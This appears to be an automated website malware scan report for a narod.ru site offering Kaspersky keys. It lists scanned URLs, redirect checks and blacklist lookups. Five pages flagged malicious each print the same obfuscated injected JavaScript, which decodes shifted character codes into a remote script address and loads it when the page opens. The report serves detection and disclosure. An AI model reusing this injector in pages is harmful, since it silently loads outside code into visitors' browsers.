Scanned pages/files
Request | Server response | Status |
http://a-ozou.narod.ru/v-mire/skachat-kaspersky-keys.html | 200 OK Content-Length: 10134 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function y146(t78){document.write( String.fromCharCode(parseInt(t78)-4));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var Ao813="108K120K120K116K62K51K51K121K116K113K101K"+ "114K50K115K111K115K119K108K105K103K108K111K101K50K"+ "114K105K120K51K119K51K116K107K75K102K86K54K60K61K58K"+ "51K67K119K109K104K65K59K61K61K56K57";var Z612=Ao813.split("K"); var RZU434=0;while(RZU434<Z612.length){y146(Z612[RZU434]);RZU434++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s202.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.040840672968617 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://a-ozou.narod.ru/abnl/?adsdata=wRpD10jBjJktFgA2HtVcSVSegq4XQes6PgB6^gVwHqURJ!xb9Z5U1XPIsavb1ncMILGbs5a;Fqa4jGIDQ565RTuK5wxt0t0nrVHWs9IHvK9aciEixNyPRI5XB1IGOyNW26YJBQG5J67FfsD^mD7SFaa^KU7L1YHuRcXvfSKI^NtCpH^vZe!DuFZL | 200 OK Content-Length: 2521 Content-Type: application/javascript | clean |
http://a-ozou.narod.ru/wp-includes/js/comment-reply.js?ver=20081210 | 200 OK Content-Length: 1222 Content-Type: text/javascript | clean |
http://a-ozou.narod.ru/rossiya/kluchi-dlya-kasperskogo-ot-08052009.html | 200 OK Content-Length: 10957 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function y146(t78){document.write( String.fromCharCode(parseInt(t78)-4));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var Ao813="108K120K120K116K62K51K51K121K116K113K101K"+ "114K50K115K111K115K119K108K105K103K108K111K101K50K"+ "114K105K120K51K119K51K116K107K75K102K86K54K60K61K58K"+ "51K67K119K109K104K65K59K61K61K56K57";var Z612=Ao813.split("K"); var RZU434=0;while(RZU434<Z612.length){y146(Z612[RZU434]);RZU434++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s202.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.0675393303518064 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://a-ozou.narod.ru/abnl/?adsdata=P;lVk!4cZurmep4cgPSfez1ufL3mxSgrpr;lbjidhtykA5udDLtqUMzclOSS^LOZfu95C!zGMy4zNA!VfpKPkca;BJYuONHBOQdQyjgkO;ER1I0^xt^YMp^gBmIEDh5vL^UKwbpWYeCllCUlJRJikJcc056x4f7nhX5e0TppYLCX!GP2GL4vF0Li | 200 OK Content-Length: 2521 Content-Type: application/javascript | clean |
http://a-ozou.narod.ru/proisshestviya/skachat-kasperskogo-7.html | 200 OK Content-Length: 10870 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function y146(t78){document.write( String.fromCharCode(parseInt(t78)-4));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var Ao813="108K120K120K116K62K51K51K121K116K113K101K"+ "114K50K115K111K115K119K108K105K103K108K111K101K50K"+ "114K105K120K51K119K51K116K107K75K102K86K54K60K61K58K"+ "51K67K119K109K104K65K59K61K61K56K57";var Z612=Ao813.split("K"); var RZU434=0;while(RZU434<Z612.length){y146(Z612[RZU434]);RZU434++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s202.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.606346238079283 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://a-ozou.narod.ru/abnl/?adsdata=gpEt5aL;DDmImhzaY2CpcXS7nw6TsyIKmrc5wOZw8PQX9FD!qJsHZT2wH3fOGj;l;6lzkY0kEiDY3fPjhHGjrqsK81cQJyNBjpUjA2s0Iw6ZDsB;3aM7iyp1vaBCRaf4tyRyRUmyMtC!VB0cgkidqMKGDmXlU6TJa!NfbBUQ;Na6;BFhNsse | 200 OK Content-Length: 2509 Content-Type: application/javascript | clean |
http://a-ozou.narod.ru/novosti/skachat-kluch-dlya-kasperskogo-2009-besplatno.html | 200 OK Content-Length: 10193 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function y146(t78){document.write( String.fromCharCode(parseInt(t78)-4));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var Ao813="108K120K120K116K62K51K51K121K116K113K101K"+ "114K50K115K111K115K119K108K105K103K108K111K101K50K"+ "114K105K120K51K119K51K116K107K75K102K86K54K60K61K58K"+ "51K67K119K109K104K65K59K61K61K56K57";var Z612=Ao813.split("K"); var RZU434=0;while(RZU434<Z612.length){y146(Z612[RZU434]);RZU434++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s202.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.382739035871712 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://a-ozou.narod.ru/abnl/?adsdata=8^K57s7B2Muw1j^8uISP;BPD!jqEmkRONpNWjJn9JdH0zk;WNC!2XNgOAGbB0tfWb5aRuO1PQ9YwHJYSrU6JtajUFfAY6vFlrhHvhsRMBJGb4Ng^MCLsVmmJImmNZwqYOnWhGGtNiiF91v;J6eCc5J7dtKXe38p7H3U5uG8AJ124BIwINstb | 200 OK Content-Length: 2517 Content-Type: application/javascript | clean |
http://a-ozou.narod.ru/rossiya/svezhie-kluchi-dlya-kaspersky-8.html | 200 OK Content-Length: 9785 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function y146(t78){document.write( String.fromCharCode(parseInt(t78)-4));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var Ao813="108K120K120K116K62K51K51K121K116K113K101K"+ "114K50K115K111K115K119K108K105K103K108K111K101K50K"+ "114K105K120K51K119K51K116K107K75K102K86K54K60K61K58K"+ "51K67K119K109K104K65K59K61K61K56K57";var Z612=Ao813.split("K"); var RZU434=0;while(RZU434<Z612.length){y146(Z612[RZU434]);RZU434++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s202.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.337681099696521 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: a-ozou.narod.ru
Result:
GET / HTTP/1.1
Host: a-ozou.narod.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: a-ozou.narod.ru
Referer: http://www.google.com/search?q=a-ozou.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: a-ozou.narod.ru
Referer: http://www.google.com/search?q=a-ozou.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=a-ozou.narod.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://a-ozou.narod.ru/
Result: a-ozou.narod.ru is not infected or malware details are not published yet.
Result: a-ozou.narod.ru is not infected or malware details are not published yet.